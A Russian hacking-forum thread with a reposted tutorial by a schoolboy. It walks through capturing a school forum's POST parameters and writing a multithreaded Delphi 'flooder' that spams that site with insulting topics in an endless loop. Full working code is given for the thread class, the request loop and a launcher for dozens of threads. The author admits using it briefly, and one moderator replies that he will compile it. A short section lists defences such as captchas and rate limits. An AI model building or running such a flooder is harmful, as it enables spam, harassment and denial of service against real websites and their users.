Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование

Хакер, взлом, программа, сайт, форум, информатика, железо, разгон, раскрутка, SEO, защита, безопасность, взломать, как взломать, взлом icq, взлом вконтакте, взлом программ, одноклассники, взлом почты, взлом аськи
Текущее время: 03-05, 11:03

Часовой пояс: UTC + 3 часа




Начать новую тему Ответить на тему  [ Сообщений: 5 ] 
Автор Сообщение
 Заголовок сообщения: Пишем флудер
СообщениеДобавлено: 21-03, 16:25 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
Желание написать прогу, способную оставлять кучу сообщений, на форуме определенного сайта, назовем его http://****/, у меня родилась после того, как в моем классе (я учусь в 11 классе) учитель объявил, что в Оренбургской области впервые будет введена система, по которой мы будем сдавать 6 ЕГЭ. Все бы ничего, но объявили об этом в середине января! и главное, среди обязательных предметов стоит литература! Блин кто знает ответ на следующий вопрос:
Какое название Н.Г. Чернышевский дал художественному открытию Толстого, отобразившего «текучесть» внутренней жизни человека, ее изменчивость?
Ответ____________________________
Это есть в демонстрационном варианте ЕГЭ по литературе за 2008 год.

Ладно, хватит нюни распускать, пора к делу. Итак, наш флудер будет оставлять на сайте обидчика кучу сообщений, вроде министр образования - ***. А вернее будет создавать кучу тем с соответствующей надписью. Писать флудер будем на Delphi, не без помощи Indy, знаю WinSock круче, но почему Фленову можно писать почтовик с помощью компонентов, а мне флудер нельзя? (кто читал Delphi глазами ][акера, тот меня поймет).

Сейчас главное понять, что веб браузер передает на сервер при создании темы. А вернее что передается при Post запросе. Итак, топаем на сайт обидчика, заходим на форум и открываем страничку создания новой темы (http://*** /obr/forum/30/add/).
Так теперь наводим мышь на кнопку с текстом «Отправить», и видим, куда эта кнопка отправляет запрос: «/obr/forum/?action=forum_add_message&forum_id=30».

Теперь у нас два варианта развития событий.
1 вариант мы ставим HTTP снифер. Например, насадку на IE, тут тебе поможет гугл и собственный мозг.
2. Мне качать снифер было лень, да и светиться на форуме не хотелось =). По этому я сохранил страничку на винт, запустил Денвер, создал виртуальный хост и запихал страницу туда. Далее в той же папке что и сохраненная страничка был создан файлик
proba.php(зачем увидишь потом). Далее в опере открыл сорцы странички и запустил поиск следующей фразы: /obr/forum/?action=forum_add_message&forum_id=30- это путь к скрипу, который отвечает за создание темы и поменял его на /proba.php (так вот зачем этот загадочный файлик =) ). Так теперь в файлик proba.php я засунул такой код:


< ?
print_r($_POST);
? >


эта штука просто выводит на экран все, что пришло в POST запросе =). Потом открыл в опере только что созданную страницу, заполнил форму и увидел, что на сервер передается следующее:
mes_author_name=vovchik // указанный ник
mes_author_mail=*****@***.ru // указанный мыльник
user_login= // логин (можно не заполнять)
user_password= //пароль (можно не заполнять)
mes_subject=Егэ в топку // тема
mes_text= ***** // сообщение

в общем, все понятно осталось тока сделать тоже самое, но с помощью Delphi. Итак, мы создадим н-ое число потоков (в Delphi каждый поток это объект и это сильно нам поможет). Каждый поток будет «бомбить» наш сайт твоими сообщениями. Представьте, у меня с исходящим каналом в виде GPRS и числом потоков в 50 штук прога оставляла 2 сообщения в секунду! Хорошо, что я вовремя остановился! Так, теперь давайте посмотрим, как пашет это «чудо». Для этого бросьте на форму компонент TIdHTTP с вкладки Indy Clients. Нам это нужно чтобы знать, какие файлы будут подключены к нашему проекту. Так теперь создайте новый поток (File->New->Other->Thread Object). Теперь сохраните проект себе на винт (это ОБЯЗАТЕЛЬНЫЙ шаг). Так теперь видите в файле потока блок uses? скопируйте туда все, из такого же блока в файле, где описывается главная форма (вот зачем мы кидали ненужный компонент на форму). Так теперь посмотрите на описание класса вашего потока вы должны увидеть что-то похожее на:

type
TFluder = class(TThread)
private
{ Private declarations }
protected
procedure Execute; override;
end;

поменяйте все на:
type
Fluder = class(TThread)
IdHTTP1: TIdHTTP;
IdCookieManager1: TIdCookieManager;
procedure IdHTTP1Redirect(Sender: TObject; var dest: String;
var NumRedirect: Integer; var Handled: Boolean;
var VMethod: TIdHTTPMethod);
private
{ Private declarations }
protected
procedure Execute; override;
end;
(только не забудьте, что имя потока у вас может быть другим!)
далее жмем ctrl+Shift+C и получаем такую вот «заготовку» события Redirect она нам пригодится:
procedure Fluder.IdHTTP1Redirect(Sender: TObject; var dest: String;
var NumRedirect: Integer; var Handled: Boolean;
var VMethod: TIdHTTPMethod);
begin
Handled:= TRUE;
end;

как ты понял, нам нужно будет в заготовку дописать тока одну строку:
Handled:= TRUE; это нужно что бы после того как мы получим редирект от сервера мы его правильно обработали =).

далее мы имеем процедуру procedure Fluder.Execute; это та процедура, с которой начнется выполнение нашего потока. Тут мы и будем «бомбить» сервер.… Но перед этим теория!

Итак, компонент TIdHTTP у нас лежит не на форме, а значит, не будет создан автоматически его придется создать «в ручную», так же как и обычный объект. Но толку от него будет мало, он ведь должен будет еще что-то передать, для этого у него есть два метода function Post(AURL: string; const ASource: TStrings): string;

и function TIdCustomHTTP.Get(AURL: string): string;
первый имеет два параметра, а второй тока один. Оба они возвратят то, что вернул нам сервер после запроса. Если у метода GET все понятно, там все данные передаются через единственный параметр, то у метода POST нужны пояснения, второй параметр нужен для передачи данных через POST запрос, и храниться они должны в объекте TStrings или его потомке (TStringList);. Думаю все понятно и пояснено, так что в бой мой друг. Теперь в процедуре Execute смело ставь такой код:
procedure Fluder.Execute;
var
txt: TStringList;
begin
IdHTTP1:= TIdHTTP.Create(NIL); //Это наш HTTP клиент
IdCookieManager1:= TIdCookieManager.Create(NIL); //Менеджер Куков иногда он нужен

txt:= TStringList.Create; //Тут будет POST запрос

while (Terminated = False) do // собсна главный цикл
begin
txt.add('mes_author_name='+NameStr); //Переменные
txt.Add('mes_author_mail='+MailStr);
txt.Add('user_login=');
txt.Add('user_password=');
txt.Add('mes_subject='+TemaStr);
txt.Add('mes_text='+TextStr);

// запрос
idHTTP1.Post('http://****/obr/forum/?action=forum_add_message&forum_id=30', txt);
end;
txt.Free;

exit;
end;

теперь мы почти готовы нам нужно только кинуть на форму кнопку и поставить к ней такой код:
procedure TForm1.Button1Click(Sender: TObject);
var
i: integer; //счетчик
Cout: integer; //число потоков
begin

try
Cout:= StrToInt(Edit1.Text); //пытаемся узнать число потоков из Edit а
except
ShowMEssage(‘Вводи верно!');
exit;
end;

NameStr:= NickEdit.Text; // думаю ты понял что все переменные я беру из Edit’ов
MailStr:= MailEdit.Text;
TemaStr:= TemaEdit.Text;
TextStr:= MessEdit.Text;

SetLength(Potoks, Cout); //Меняю длину массива указателей

for i:= 0 to Cout-1 do //активирую флуд
begin
Potoks[i]:= Fluder.Create(true);
Potoks[i].Resume;
Potoks[i].Priority:= tpLower;
end;
end;

тут мы создаем энное количество потоков и хирячим ими сайт недруга!
Перед компиляцией добавь в глобальные переменные вот это:
var
Form1: TForm1;
Potoks: array of Fluder; //Массив указателей на потоки
NameStr, MailStr, TemaStr, TextStr: string; //Строки где хранятся переменные для //передачи на сервер я их беру из Edit’ов

думаю, ты сам во всем разберешься, если тока подумаешь, это конечно не идеальный метод и подойдет он только для определенного количества форумных движков, но и это уже здорово!
Мораль: помни флуд - это не гуманно! и не красиво этому стоит научиться, чтобы защищаться от этого! но не более того, я не в коем случае не хочу побуждать тебя к действию я лишь хочу указать на не совершенство некоторых сайтов.

Информация к размышлению: Итак, почему мне удалось написать флудер так быстро? Виноват в этом конечно администратор портала, то подобие на форум, что поставил админ, не имеет ни каких преград для таких флудерастов как я =). Право оставлять сообщения на форуме должны иметь только зарегистрированные пользователи! причем движок не должен принимать более 2-3 сообщений в минуту от одного и того же пользователя, человек физически не сможет написать больше сообщений! При регистрации пользователя должна быть капча, она конечно тоже не надежна, но это защитит от большинства таких «атак». В общем, не делайте таких ошибок.

Happy End: кст. нам все же отменили ЕГЭ по литре теперь мы будем сдавать ее в традиционной форме, и хорошо что я не успел применить флудер по назначению!(разве что совсем чуть-чуть =)).
Пару слов модератору:
Я заранее извиняюсь за свой Русский язык, я выше тройки по нему никогда не имел, и все контрольные нагло списывал у одноклассниц, так что извиняюсь...

alexsandrch-ch


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 10-12, 20:30 
Не в сети
Starting AH-user

Зарегистрирован: 10-12, 20:22
Сообщения: 11
Рулишь чел


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 10-12, 20:32 
Не в сети
<b><font color=red>Admin</font></b>
Аватара пользователя

Зарегистрирован: 22-05, 15:38
Сообщения: 1901
Геннадий
Вообще-то внизу стоят копирайты - это не моя статья)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 25-12, 22:45 
Не в сети
<b><font color=blue>Moder</b></font>

Зарегистрирован: 30-10, 08:41
Сообщения: 65
:mrgreen: будем пробовать статейка заинтересовала... хз актуальна или нет, домой приду буду компилить :) еси че потом отпишуся)


Вернуться к началу
 Профиль  
 
 Заголовок сообщения:
СообщениеДобавлено: 25-01, 22:11 
Не в сети
New AH-user

Зарегистрирован: 25-01, 22:02
Сообщения: 5
вируси - это зло!

_________________
СРУБИ БАБКИ!!!


Вернуться к началу
 Профиль  
 
Показать сообщения за:  Поле сортировки  
Начать новую тему Ответить на тему  [ Сообщений: 5 ] 

Часовой пояс: UTC + 3 часа


Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 2


Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения

Найти:
Перейти:  
cron
Powered by Forumenko © 2006–2014
Русская поддержка phpBB